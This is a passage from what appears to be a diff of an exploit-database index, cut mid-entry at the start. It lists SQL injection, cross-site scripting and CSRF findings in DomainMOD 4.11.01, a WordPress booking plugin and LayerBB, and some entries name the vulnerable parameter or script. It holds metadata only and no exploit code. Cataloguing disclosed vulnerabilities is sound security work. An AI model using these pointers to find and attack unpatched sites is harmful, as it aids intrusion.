'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80 +46372,exploits/php/webapps/46372.txt,"DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php, +46373,exploits/php/webapps/46373.txt,"DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80 +46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80 +46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80 +46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80 +46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80 +46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80